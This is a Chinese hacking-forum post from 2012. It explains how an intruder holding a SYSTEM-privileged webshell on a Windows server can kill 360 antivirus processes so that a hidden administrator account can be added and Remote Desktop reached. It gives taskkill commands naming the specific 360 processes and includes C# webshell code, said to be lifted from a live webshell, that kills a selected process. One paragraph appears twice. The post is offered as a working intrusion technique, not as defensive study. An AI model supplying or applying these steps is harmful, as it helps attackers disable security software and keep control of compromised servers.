找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3299|回复: 0
打印 上一主题 下一主题

服务器system权限webshell无法添加账户突破360方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-21 13:42:23 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
webshell有system权限,无法添加administrators用户,最后无法成功连接3389,这一般都是杀毒软件引起了,说下突破360的方法

先查看进程:tasklist

然后杀掉进程:taskkill /im 进程名.exe /f

这些是360的进程:360tray.exe,360rp.exe,Zhudongfangyu.exe,360rps.exe

然后关掉360的主动防御,方法:

Windows下Apache+PHP的特殊性,导致很多php站的webshell有SYSTEM的权限,所以结束360简直易如反掌啊。
即使不是SYSTEM,也有办法的,例如ASPX,asp.net有个操纵进程的功能。看代码(直接从webshell上面拔下来的):

Windows下Apache+PHP的特殊性,导致很多php站的webshell有SYSTEM的权限,所以结束360简直易如反掌啊。
即使不是SYSTEM,也有办法的,例如ASPX,asp.net有个操纵进程的功能。看代码(直接从webshell上面拔下来的):

protected void kp_Click(object sender, EventArgs e)
{
Process[] kp = Process.GetProcesses ();
foreach ( Process kp1 in kp )
if (kp1.ProcessName == ListBox1.SelectedValue.ToString())
{
try
{
kp1.Kill();
Response.Write(“<script>alert(‘Killed’);location.href=’?'</” + “script>”);
ListBox1.Items.Clear();
}
catch (Exception x)
{
Response.Write(x.Message.ToString());
Response.End();
}
}
}
asp.net的这一个kill()函数即使是IIS+ASPX的users用户组依然可以轻松杀死360。

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表